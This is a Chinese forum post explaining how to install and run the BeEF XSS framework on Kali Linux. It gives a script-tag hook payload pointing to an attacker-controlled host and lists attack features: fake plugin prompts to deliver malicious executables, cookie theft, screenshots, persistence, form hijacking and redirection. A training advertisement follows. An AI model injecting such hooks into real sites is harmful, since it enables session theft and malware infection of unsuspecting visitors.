beef-xss kalilinux下的安装使用

[复制链接]
发表于 2025-10-28 23:29:55 | 显示全部楼层 |阅读模式
安装
截图202510281453316331.png

按照提示,一路 y 即可,如果不是sudo,那么会提示输入用户密码

启动 beef-xss
  1. sudo beef-xss
复制代码
截图202510281457089797.png

第一次启动可能会提示这个,让你输入一个新的密码,输入回车即可(不会显示你输入的密码)下一次就不会让你输入了

如果你忘记了密码?
  1. sudo vim /usr/share/beef-xss/config.yaml
复制代码


截图202510281502218927.png

利用代码:
  1. <script src="http://ip:3000/hook.js"></script>
复制代码
找一个存在XSS的地方执行
截图202510281609039581.png

利用:
1,虚假通知栏:
截图202510290149352672.png
执行之后,弹出安装提示:
截图202510290150271788.png
这个可以把插件换为恶意的 exe 文件,然后下载运行后进行上线。比如可以伪造一个游戏下载的网页......,
2,XSS弹窗
截图202510290155069366.png

3,coo窃取
截图202510290154443645.png

4,截图
截图202510290153395449.png

5,权限维持
截图202510290153203813.png

6,劫持输入表单
截图202510290153029920.png
7,重定向
截图202510290154281226.png
功能多多,暂不列举。

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:16 , Processed in 0.080478 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表